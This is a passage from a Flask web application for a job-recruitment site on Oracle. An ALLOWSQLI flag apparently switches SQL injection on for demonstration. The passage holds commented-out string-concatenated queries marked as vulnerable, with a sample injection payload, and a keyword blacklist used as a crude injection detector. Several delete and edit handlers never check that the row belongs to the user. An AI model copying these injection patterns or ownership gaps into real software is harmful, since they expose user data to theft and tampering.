            dic["salary"]=values['salary']
            dic["sid"]=current_user.id
            for value in dic.values():
                if value=='':
                    return render_template('info_modification.html',flags=ALLOWSQLI,form=form,error='所有表格都为必填项,请重新填写!',username=current_user.username)
            if is_number(values['phone_number'])==False:
                return render_template('info_modification.html',flags=ALLOWSQLI,form=form,error='电话号码格式错误,请重新填写!',username=current_user.username)
            db.modify("insert into weboracle.student_info (stu_id,name,sex,birth_time,education_background,time_of_graduation,school_of_graduation,major,resume,phone_number,job_time,job_wanted,salary,sid) values (:stu_id,:name,:sex,to_date(:birth_time,'yyyy-mm-dd'),:education_background,to_date(:time_of_graduation,'yyyy-mm-dd'),:school_of_graduation,:major,:resume,:phone_number,:job_time,:job_wanted,:salary,:sid)",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        except:
            db.rollback()
            return render_template('info_modification.html',flags=ALLOWSQLI,form=form,error='服务器发生错误,请重试!',username=current_user.username)
        finally:
            db.close()
        return render_template('info_modification.html',flags=ALLOWSQLI, form=form,info='发布成功!',username=current_user.username)
    return render_template('info_modification.html',flags=ALLOWSQLI, form=form,username=current_user.username)
# @app.route('/')
@app.route('/manager_info',methods=['GET','POST'])
@login_required
@admin_required
def manager_info():
    """Admin page: list all job-seeker rows; POST with 'delete' removes one."""
    form=SecrityForm()
    db=DataBasePool()
    db.connect(pool)
    # NOTE(review): on the form-submit path below the connection is never
    # closed — db.close() only runs in the else-branch's finally.
    if form.validate_on_submit():
        if request.form.get('delete',None)!=None:
            dic = {}
            type_pk = request.form.get('pk', None)
            dic['stu_id'] = type_pk
            db.modify("delete from weboracle.student_info where stu_id=:stu_id", dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
            ll = []
            results = db.select(
                "select stu_id,name,sex,to_char(birth_time,'yyyy/mm/dd'),education_background,school_of_graduation,to_char(time_of_graduation,'yyyy-mm-dd'),major,resume,phone_number,job_time,job_wanted,salary from weboracle.student_info ",ALLOWSQLI=ALLOWSQLI)
            for item in results[1]:
                dic = {}
                dic["stu_id"] = item[0]
                dic["name"] = item[1]
                # sex appears to be a padded CHAR column — TODO confirm schema.
                if str(item[2]) == "man " or str(item[2]) == "男 ":
                    dic["sex"] = '男'
                else:
                    dic["sex"] = '女'
                dic["birth_time"] = item[3]
                dic["education_background"] = item[4]
                dic["school_of_graduation"] = item[5]
                dic["time_of_graduation"] = item[6]
                dic["major"] = item[7]
                dic["resume"] = item[8]
                dic["phone_number"] = item[9]
                dic["job_time"] = item[10]
                dic["job_wanted"] = item[11]
                dic["salary"] = item[12]
                ll.append(dic)
            return render_template('manager_info.html',flags=ALLOWSQLI, form=form, URL='/modify_self_info', manager_info_result=ll,
                                   error='删除成功!',username=current_user.username)
        return render_template('manager_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',username=current_user.username)
    else:
        try:
            ll=[]
            results=db.select("select stu_id,name,sex,to_char(birth_time,'yyyy/mm/dd'),education_background,school_of_graduation,to_char(time_of_graduation,'yyyy-mm-dd'),major,resume,phone_number,job_time,job_wanted,salary from weboracle.student_info ",ALLOWSQLI=ALLOWSQLI)
            for item in results[1]:
                dic={}
                dic["stu_id"]=item[0]
                dic["name"]=item[1]
                if str(item[2])=="man " or str(item[2])=="男 ":
                    dic["sex"]='男'
                else:
                    dic["sex"]='女'
                dic["birth_time"]=item[3]
                dic["education_background"]=item[4]
                dic["school_of_graduation"]=item[5]
                dic["time_of_graduation"]=item[6]
                dic["major"]=item[7]
                dic["resume"]=item[8]
                dic["phone_number"]=item[9]
                dic["job_time"]=item[10]
                dic["job_wanted"]=item[11]
                dic["salary"]=item[12]
                ll.append(dic)
            return render_template('manager_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',manager_info_result=ll,username=current_user.username)
        except:
            return render_template('manager_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',error='服务器发生错误!!!',username=current_user.username)
        finally:
            db.close()
        # NOTE(review): unreachable — both try and except branches return above.
        return render_template('manager_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',error='未查询到数据,请刷新重试!',username=current_user.username)
@app.route('/manager_user',methods=['GET','POST'])
@login_required
@admin_required
def manager_user():
    """Admin page: list accounts; POST deletes a non-admin user or edits a field."""
    form=SecrityForm()
    db = DataBasePool()
    db.connect(pool)
    # NOTE(review): on the form-submit paths below the connection is never
    # closed — db.close() only runs in the else-branch's finally.
    if form.validate_on_submit():
        if request.form.get('delete',None)!=None:
            dic = {}
            type_pk = request.form.get('pk', None)
            dic['sid'] = type_pk
            results = db.select("select user_type from weboracle.users where sid=:sid", dic)
            if len(results[1])!=0:
                if int(results[1][0][0])!=1:
                    # print(type(results[1][0][0]))
                    logger.warning('无权限删除管理员信息')
                    abort(403)
                    # NOTE(review): unreachable (abort() raises).
                    return render_template('manager_user.html',flags=ALLOWSQLI, form=form, URL='/manager_user',username=current_user.username)
            # Remove the user and all rows that reference it.
            db.modify("delete from weboracle.users where sid=:sid", dic)
            db.modify("delete from weboracle.student_info where sid=:sid", dic)
            db.modify("delete from weboracle.company_info where sid=:sid", dic)
            db.commit()
            ll = []
            results = db.select(
                "select sid,username,user_type,E_mail,login_num,last_login_time from weboracle.users order by last_login_time desc")
            for item in results[1]:
                dic = {}
                dic["sid"] = item[0]
                dic["username"] = item[1]
                dic["user_type"] = item[2]
                dic["Email"] = item[3]
                dic["login_num"] = item[4]
                dic["last_login_time"] = item[5]
                ll.append(dic)
            return render_template('manager_user.html',flags=ALLOWSQLI, form=form, URL='/manager_user', manager_user_result=ll,
                                   error='删除成功',username=current_user.username)
        else:
            ll = []
            results = db.select(
                "select sid,username,user_type,E_mail,login_num,last_login_time from weboracle.users order by last_login_time desc")
            for item in results[1]:
                dic = {}
                dic["sid"] = item[0]
                dic["username"] = item[1]
                dic["user_type"] = item[2]
                dic["Email"] = item[3]
                dic["login_num"] = item[4]
                dic["last_login_time"] = item[5]
                ll.append(dic)
            return render_template('manager_user.html',flags=ALLOWSQLI, form=form, URL='/manager_user', manager_user_result=ll,
                                   error='删除成功', username=current_user.username)
        # NOTE(review): the field-update logic below appears unreachable —
        # both branches above return; confirm the intended indentation.
        type_name = request.form.get('name', None)
        type_value = request.form.get('value', None)
        type_pk = request.form.get('pk', None)
        pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
        r = re.search(pattern, str(type_name).lower())
        if r:
            logger.warning('type_name一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
            abort(405)
            return render_template('manager_user.html',flags=ALLOWSQLI,form=form,URL='/manager_user',username=current_user.username)
        r = re.search(pattern, str(type_value).lower())
        if r:
            logger.warning('type_value一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
            abort(405)
            return render_template('manager_user.html',flags=ALLOWSQLI,form=form,URL='/manager_user',username=current_user.username)
        r = re.search(pattern, str(type_pk).lower())
        if r:
            logger.warning('type_pk一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
            abort(405)
            return render_template('manager_user.html',flags=ALLOWSQLI,form=form,URL='/manager_user',username=current_user.username)
        dic={}
        dic['sid']=type_pk
        dic['value']=type_value
        if type_name=='username':
            db.modify("update weboracle.users set username=:value where sid=:sid",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='user_type':
            db.modify("update weboracle.users set user_type=:value where sid=:sid",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='EMail':
            db.modify("update weboracle.users set e_mail=:value where sid=:sid",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        else :
            return render_template('manager_user.html',flags=ALLOWSQLI,form=form,URL='/manager_user',error='未知错误',username=current_user.username)
        return render_template('manager_user.html',flags=ALLOWSQLI,form=form,URL='/manager_user',error='修改成功',username=current_user.username)
    else:
        try:
            ll=[]
            results=db.select("select sid,username,user_type,E_mail,login_num,last_login_time from weboracle.users order by last_login_time desc",ALLOWSQLI=ALLOWSQLI)
            for item in results[1]:
                dic={}
                dic["sid"]=item[0]
                dic["username"]=item[1]
                dic["user_type"]=item[2]
                dic["Email"]=item[3]
                dic["login_num"]=item[4]
                dic["last_login_time"]=item[5]
                ll.append(dic)
            return render_template('manager_user.html',flags=ALLOWSQLI,form=form,URL='/manager_user',manager_user_result=ll,username=current_user.username)
        except:
            return render_template('manager_user.html',flags=ALLOWSQLI,form=form,URL='/manager_user',error='服务器发生错误!!!',username=current_user.username)
        finally:
            db.close()
        # NOTE(review): unreachable — both try and except branches return above.
        return render_template('manager_user.html',flags=ALLOWSQLI,form=form,URL='/manager_user',error='未查询到数据,请刷新重试!',username=current_user.username)
@app.route('/modify_self_info',methods=['GET','POST'])
@login_required
def modify_self_info():
    """Let the logged-in student view, search, edit and delete their own
    resume rows in weboracle.student_info.

    Request handling, in order:
      * POST carrying ``search``       -> keyword search over the user's rows.
      * Validated POST with ``delete`` -> delete row ``pk``, then re-list.
      * Other validated POST           -> inline edit: set the column named by
                                          ``name`` to ``value`` on row ``pk``.
      * Plain GET / anything else      -> list every row owned by the user.
    """
    form=SecrityForm()
    db = DataBasePool()
    db.connect(pool)
    keys=request.form.get('search',None)
    if keys != None:
        # -------- search branch --------
        try:
            ll = []
            d = {}
            # print(keys)
            d["sid"]=current_user.id
            # '''The approach below is vulnerable to SQL injection'''
            # #05%') OR ('ab' like '%a
            # '''
            # sql = "select stu_id,name,sex,to_char(birth_time,'yyyy/mm/dd'),education_background,school_of_graduation,to_char(time_of_graduation,'yyyy-mm-dd'),major,resume,phone_number,job_time,job_wanted,salary from weboracle.student_info where sid=:sid AND (stu_id like '%" + keys + "%' OR name like '%" + keys + "%' OR sex like '%" + keys + "%' OR to_char(birth_time,'yyyy/mm/dd') like '%" + keys + "%' OR education_background like '%" + keys + "%' OR school_of_graduation like '%" + keys+ "%' OR to_char(time_of_graduation,'yyyy-mm-dd') like '%" + keys+ "%' OR major like '%" + keys+ "%' OR resume like '%" + keys+ "%' OR phone_number like '%"+ keys+ "%' OR job_time like '%"+ keys+ "%' OR job_wanted like '%"+ keys + "%' OR salary like '%"+ keys + "%') order by stu_id desc"
            # print(sql)
            # results = db.select(sql, d)
            # '''
            # '''The approach below is NOT vulnerable (bind variables)'''
            d["pattern"] = '%' + keys + '%'
            results=db.select("select stu_id,name,sex,to_char(birth_time,'yyyy/mm/dd'),education_background,school_of_graduation,to_char(time_of_graduation,'yyyy-mm-dd'),major,resume,phone_number,job_time,job_wanted,salary from weboracle.student_info where sid=:sid AND ( stu_id like :pattern OR name like :pattern OR sex like :pattern OR to_char(birth_time,'yyyy/mm/dd') like :pattern OR education_background like :pattern OR school_of_graduation like :pattern OR to_char(time_of_graduation,'yyyy-mm-dd') like :pattern OR major like :pattern OR resume like :pattern OR phone_number like :pattern OR job_time like :pattern OR job_wanted like :pattern OR salary like :pattern) order by stu_id desc",d,ALLOWSQLI=ALLOWSQLI)
            # print(results)
            for item in results[1]:
                dic = {}
                dic["stu_id"] = item[0]
                dic["name"] = item[1]
                # sex appears to be stored as a padded code ("man " / "男 "
                # means male; everything else renders as female) — presumably
                # a fixed-width CHAR column; confirm against the schema.
                if str(item[2]) == "man " or str(item[2]) == "男 ":
                    dic["sex"] = '男'
                else:
                    # print(str(item[2])+"?")
                    dic["sex"] = '女'
                dic["birth_time"] = item[3]
                dic["education_background"] = item[4]
                dic["school_of_graduation"] = item[5]
                dic["time_of_graduation"] = item[6]
                dic["major"] = item[7]
                dic["resume"] = item[8]
                dic["phone_number"] = item[9]
                dic["job_time"] = item[10]
                dic["job_wanted"] = item[11]
                dic["salary"] = item[12]
                ll.append(dic)
            return render_template('modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/modify_self_info',
                modify_self_info_result=ll, username=current_user.username)
        except:
            return render_template('modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/modify_self_info',
                error="服务器发生错误", username=current_user.username)
        finally:
            db.close()
        # NOTE(review): unreachable — both the try and except paths return above.
        return render_template('modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/modify_self_info',
            error="为查询到数据", username=current_user.username)
    if form.validate_on_submit():
        if request.form.get('delete',None)!=None:
            # -------- delete branch: remove row ``pk`` then re-list --------
            dic = {}
            type_pk = request.form.get('pk', None)
            dic['stu_id'] = type_pk
            db.modify("delete from weboracle.student_info where stu_id=:stu_id", dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
            ll=[]
            d={}
            d['sid']=current_user.id
            results=db.select("select stu_id,name,sex,to_char(birth_time,'yyyy/mm/dd'),education_background,school_of_graduation,to_char(time_of_graduation,'yyyy-mm-dd'),major,resume,phone_number,job_time,job_wanted,salary from weboracle.student_info where sid=:sid",d,ALLOWSQLI=ALLOWSQLI)
            for item in results[1]:
                dic={}
                dic["stu_id"]=item[0]
                dic["name"]=item[1]
                if str(item[2])=="man " or str(item[2])=="男 ":
                    dic["sex"]='男'
                else:
                    dic["sex"]='女'
                dic["birth_time"]=item[3]
                dic["education_background"]=item[4]
                dic["school_of_graduation"]=item[5]
                dic["time_of_graduation"]=item[6]
                dic["major"]=item[7]
                dic["resume"]=item[8]
                dic["phone_number"]=item[9]
                dic["job_time"]=item[10]
                dic["job_wanted"]=item[11]
                dic["salary"]=item[12]
                ll.append(dic)
            return render_template('modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/modify_self_info',
                modify_self_info_result=ll, username=current_user.username)
        # None=request.form.get('delete', None)
        # -------- inline-edit branch --------
        type_name = request.form.get('name', None)
        type_value = request.form.get('value', None)
        type_pk = request.form.get('pk', None)
        # Blacklist of SQL keywords/metacharacters used as a crude injection
        # filter ("delclare" is a typo of "declare", preserved as-is).
        pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
        r = re.search(pattern, str(type_name).lower())
        if r:
            logger.warning('type_name一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
            abort(405)
            # NOTE(review): unreachable — abort() raises.
            return render_template('modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',username=current_user.username)
        r = re.search(pattern, str(type_value).lower())
        if r:
            logger.warning('type_value一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
            abort(405)
            # NOTE(review): unreachable — abort() raises.
            return render_template('modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/modify_self_info',username=current_user.username)
        r = re.search(pattern, str(type_pk).lower())
        if r:
            logger.warning('type_pk一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
            abort(405)
            # NOTE(review): unreachable — abort() raises.
            return render_template('modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/modify_self_info',username=current_user.username)
        dic={}
        dic['stu_id']=type_pk
        dic['value']=type_value
        # print(dic)
        # One UPDATE per editable column; date columns go through to_date().
        if type_name=='names':
            db.modify("update weboracle.student_info set name=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='sex':
            db.modify("update weboracle.student_info set sex=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='birth_time':
            db.modify("update weboracle.student_info set birth_time=to_date(:value,'yyyy-mm-dd') where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='education_background':
            db.modify("update weboracle.student_info set education_background=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='time_of_graduation':
            db.modify("update weboracle.student_info set time_of_graduation=to_date(:value,'yyyy-mm-dd') where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='school_of_graduation':
            db.modify("update weboracle.student_info set school_of_graduation=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='major':
            db.modify("update weboracle.student_info set major=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='phone_number':
            db.modify("update weboracle.student_info set phone_number=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='job_wanted':
            db.modify("update weboracle.student_info set job_wanted=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='job_time':
            db.modify("update weboracle.student_info set job_time=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='salary':
            db.modify("update weboracle.student_info set salary=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='resume':
            db.modify("update weboracle.student_info set resume=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        else :
            return render_template('modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',error='未知错误',username=current_user.username)
        return render_template('modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',error='修改成功',username=current_user.username)
    else:
        # -------- plain GET: list every row owned by the current user --------
        try:
            db=DataBasePool()
            db.connect(pool)
            ll=[]
            d={}
            d['sid']=current_user.id
            results=db.select("select stu_id,name,sex,to_char(birth_time,'yyyy/mm/dd'),education_background,school_of_graduation,to_char(time_of_graduation,'yyyy-mm-dd'),major,resume,phone_number,job_time,job_wanted,salary from weboracle.student_info where sid=:sid",d,ALLOWSQLI=ALLOWSQLI)
            for item in results[1]:
                dic={}
                dic["stu_id"]=item[0]
                dic["name"]=item[1]
                if str(item[2])=="man " or str(item[2])=="男 ":
                    dic["sex"]='男'
                else:
                    # print(str(item[2])+"?")
                    dic["sex"]='女'
                dic["birth_time"]=item[3]
                dic["education_background"]=item[4]
                dic["school_of_graduation"]=item[5]
                dic["time_of_graduation"]=item[6]
                dic["major"]=item[7]
                dic["resume"]=item[8]
                dic["phone_number"]=item[9]
                dic["job_time"]=item[10]
                dic["job_wanted"]=item[11]
                dic["salary"]=item[12]
                ll.append(dic)
            return render_template('modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',modify_self_info_result=ll,username=current_user.username)
        except:
            return render_template('modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',error='服务器发生错误!!!',username=current_user.username)
        finally:
            db.close()
        # NOTE(review): unreachable — both the try and except paths return above.
        return render_template('modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',error='未查询到数据,请刷新重试!',username=current_user.username)
@app.route('/person_resume')
@login_required
def person_resume():
    """Render a student's resume looked up by the ``jobID`` query parameter.

    The raw parameter is screened against a SQL-keyword blacklist before it
    is bound into the query; a hit is logged and rejected with HTTP 405.
    """
    form = SecrityForm()
    url = request.args.get('jobID')
    # Crude injection filter: SQL keywords / metacharacters blacklist
    # ("delclare" is a typo of "declare", preserved for consistency with
    # the other handlers in this file).
    pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
    r = re.search(pattern, str(url).lower())
    if r:
        logger.warning('url一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
        # abort() raises immediately; the unreachable render_template call
        # that used to follow it has been removed.
        abort(405)
    if url is not None:
        db = DataBasePool()
        db.connect(pool)
        try:
            ll = []
            d = {'stu_id': url}
            results = db.select(
                "select name,sex,to_char(birth_time,'yyyy/mm/dd'),education_background,school_of_graduation,to_char(time_of_graduation,'yyyy-mm-dd'),major,resume,phone_number,job_time,job_wanted,salary from weboracle.student_info where stu_id=:stu_id",
                d, ALLOWSQLI=ALLOWSQLI)
            for item in results[1]:
                ll.append({
                    "name": item[0],
                    # DB stores a padded code ("man ") for male; anything
                    # else renders as female.
                    "sex": '男' if str(item[1]) == "man " else '女',
                    # Display age (in years) derived from the birth date.
                    "birth_time": str(calculate_age(item[2])) + '岁',
                    "education_background": item[3],
                    "school_of_graduation": item[4],
                    "time_of_graduation": item[5],
                    "major": item[6],
                    "resume": item[7],
                    "phone_number": item[8],
                    "job_time": item[9],
                    "job_wanted": item[10],
                    "salary": item[11],
                })
            return render_template('person_resume.html', flags=ALLOWSQLI, form=form,
                                   person_resume_result=ll, username=current_user.username)
        except Exception:
            # Fixed message typo: 发送 ("send") -> 发生 ("occurred").
            return render_template('person_resume.html', flags=ALLOWSQLI, form=form,
                                   error='服务器发生错误,请重试!', username=current_user.username)
        finally:
            db.close()
    else:
        return render_template('person_resume.html', flags=ALLOWSQLI, form=form,
                               error='没有查询到结果,请返回重试', username=current_user.username)
@app.route('/company_resume')
@login_required
def company_resume():
    """Render a company posting looked up by the ``comID`` query parameter.

    The raw parameter is screened against a SQL-keyword blacklist before it
    is bound into the query; a hit is logged and rejected with HTTP 405.
    """
    form = SecrityForm()
    url = request.args.get('comID')
    # Crude injection filter: SQL keywords / metacharacters blacklist.
    pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
    r = re.search(pattern, str(url).lower())
    if r:
        logger.warning('url一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
        # abort() raises immediately; the unreachable render_template call
        # that used to follow it has been removed.
        abort(405)
    if url is not None:
        db = DataBasePool()
        db.connect(pool)
        try:
            ll = []
            d = {'company_id': url}
            results = db.select(
                "select name,brief_introduce,address,contact_person,phone_number,person_num,requirement,time_of_end,workplace,salary,job_title from weboracle.company_info where company_id=:company_id",
                d, ALLOWSQLI=ALLOWSQLI)
            for item in results[1]:
                ll.append({
                    "name": item[0],
                    "brief_introduce": item[1],
                    "address": item[2],
                    "contact_person": item[3],
                    "phone_number": item[4],
                    "person_num": item[5],
                    "requirement": item[6],
                    "time_of_end": item[7],
                    "workplace": item[8],
                    "salary": item[9],
                    "job_title": item[10],
                })
            return render_template('company_resume.html', flags=ALLOWSQLI, form=form,
                                   company_resume_result=ll, username=current_user.username)
        except Exception:
            # Fixed message typo: 发送 ("send") -> 发生 ("occurred").
            return render_template('company_resume.html', flags=ALLOWSQLI, form=form,
                                   error='服务器发生错误,请重试!', username=current_user.username)
        finally:
            db.close()
    else:
        return render_template('company_resume.html', flags=ALLOWSQLI, form=form,
                               error='没有查询到结果,请返回重试', username=current_user.username)
@app.route('/company_modify_self_info',methods=['GET','POST'])
@login_required
def company_modify_self_info():
    """Let a logged-in company account view, search, edit and delete its own
    postings in weboracle.company_info.

    Same dispatch pattern as modify_self_info:
      * POST carrying ``search``       -> keyword search over own postings.
      * Validated POST with ``delete`` -> delete posting ``pk``, then re-list.
      * Other validated POST           -> inline edit of one column on ``pk``.
      * Plain GET / anything else      -> list every posting owned by the user.
    """
    form=SecrityForm()
    db = DataBasePool()
    db.connect(pool)
    keys = request.form.get('search', None)
    if keys != None:
        # -------- search branch --------
        try:
            ll = []
            d = {}
            d["sid"] = current_user.id
            # '''The approach below is vulnerable to SQL injection'''
            # # 05%') OR ('ab' like '%a
            # sql="select company_id,name,brief_introduce,address,contact_person,phone_number,person_num,requirement,time_of_end,workplace,salary,job_title from weboracle.company_info where sid=:sid AND ( company_id like '%" + keys + "%' OR name like '%" + keys + "%' OR brief_introduce like '%" + keys + "%' OR address like '%" + keys + "%' OR contact_person like '%" + keys + "%' OR phone_number like '%" + keys + "%' OR person_num like '%" + keys + "%' OR requirement like '%" + keys + "%' OR time_of_end like '%" + keys + "%' OR workplace like '%" + keys + "%' OR salary like '%" + keys + "%' OR job_title like '%" + keys + "%') order by company_id desc"
            # # print(sql)
            # results = db.select(sql, d)
            # '''The approach below is NOT vulnerable (bind variables)'''
            d["pattern"] = '%' + keys + '%'
            results = db.select(
                "select company_id,name,brief_introduce,address,contact_person,phone_number,person_num,requirement,time_of_end,workplace,salary,job_title from weboracle.company_info where sid=:sid AND ( company_id like :pattern OR name like :pattern OR brief_introduce like :pattern OR address like :pattern OR contact_person like :pattern OR phone_number like :pattern OR person_num like :pattern OR requirement like :pattern OR time_of_end like :pattern OR workplace like :pattern OR salary like :pattern OR job_title like :pattern) order by company_id desc",
                d,ALLOWSQLI=ALLOWSQLI)
            # print(results)
            for item in results[1]:
                dic = {}
                dic["company_id"] = item[0]
                dic["name"] = item[1]
                dic["brief_introduce"] = item[2]
                dic["address"] = item[3]
                dic["contact_person"] = item[4]
                dic["phone_number"] = item[5]
                dic["person_num"] = item[6]
                dic["requirement"] = item[7]
                dic["time_of_end"] = item[8]
                dic["workplace"] = item[9]
                dic["salary"] = item[10]
                dic["job_title"] = item[11]
                ll.append(dic)
            return render_template('company_modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/company_modify_self_info',
                company_modify_self_info_result=ll, username=current_user.username)
        except:
            return render_template('company_modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/company_modify_self_info',
                error="服务器发生错误", username=current_user.username)
        finally:
            db.close()
        # NOTE(review): unreachable — both the try and except paths return above.
        return render_template('company_modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/company_modify_self_info',
            error="为查询到数据", username=current_user.username)
    if form.validate_on_submit():
        if request.form.get('delete',None)!=None:
            # -------- delete branch: remove posting ``pk`` then re-list --------
            dic = {}
            type_pk = request.form.get('pk', None)
            dic['company_id'] = type_pk
            db.modify("delete from weboracle.company_info where company_id=:company_id", dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
            ll = []
            d = {}
            d['sid'] = current_user.id
            results = db.select(
                "select company_id,name,brief_introduce,address,contact_person,phone_number,person_num,requirement,time_of_end,workplace,salary,job_title from weboracle.company_info where sid=:sid order by time_of_end desc",
                d,ALLOWSQLI=ALLOWSQLI)
            for item in results[1]:
                dic = {}
                dic["company_id"] = item[0]
                dic["name"] = item[1]
                dic["brief_introduce"] = item[2]
                dic["address"] = item[3]
                dic["contact_person"] = item[4]
                dic["phone_number"] = item[5]
                dic["person_num"] = item[6]
                dic["requirement"] = item[7]
                dic["time_of_end"] = item[8]
                dic["workplace"] = item[9]
                dic["salary"] = item[10]
                dic["job_title"] = item[11]
                ll.append(dic)
            return render_template('company_modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/company_modify_self_info',
                company_modify_self_info_result=ll, username=current_user.username)
        # -------- inline-edit branch --------
        type_name = request.form.get('name', None)
        type_value = request.form.get('value', None)
        type_pk = request.form.get('pk', None)
        # Blacklist of SQL keywords/metacharacters used as a crude injection filter.
        pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
        r = re.search(pattern, str(type_name).lower())
        if r:
            logger.warning('type_name一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
            abort(405)
            # NOTE(review): unreachable — abort() raises.
            return render_template('company_modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',username=current_user.username)
        r = re.search(pattern, str(type_value).lower())
        if r:
            logger.warning('type_value一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
            abort(405)
            # NOTE(review): unreachable — abort() raises.
            return render_template('company_modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',username=current_user.username)
        r = re.search(pattern, str(type_pk).lower())
        if r:
            logger.warning('type_pk一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
            abort(405)
            # NOTE(review): unreachable — abort() raises.
            return render_template('company_modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',username=current_user.username)
        dic={}
        # NOTE(review): the bind name 'stu_id' is a misnomer here — it carries
        # the company_id primary key.  It matches the :stu_id placeholder in
        # every UPDATE below, so behavior is consistent; renaming would touch
        # all twelve statements.
        dic['stu_id']=type_pk
        dic['value']=type_value
        # One UPDATE per editable column; the date column goes through to_date().
        if type_name=='company_name':
            db.modify("update weboracle.company_info set name=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='brief_introduce':
            db.modify("update weboracle.company_info set brief_introduce=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='address':
            db.modify("update weboracle.company_info set address=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='job_type':
            db.modify("update weboracle.company_info set job_title=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='company_dob':
            db.modify("update weboracle.company_info set time_of_end=to_date(:value,'yyyy-mm-dd') where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='workplace':
            db.modify("update weboracle.company_info set workplace=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='company_salary':
            db.modify("update weboracle.company_info set salary=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='contact_person':
            db.modify("update weboracle.company_info set contact_person=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='company_phone_number':
            db.modify("update weboracle.company_info set phone_number=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='person_num':
            db.modify("update weboracle.company_info set person_num=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        elif type_name=='company_comments':
            db.modify("update weboracle.company_info set requirement=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
        else :
            return render_template('company_modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',error='未知错误',username=current_user.username)
        return render_template('company_modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',error='修改成功',username=current_user.username)
    else:
        # -------- plain GET: list every posting owned by the current user --------
        try:
            db=DataBasePool()
            db.connect(pool)
            ll=[]
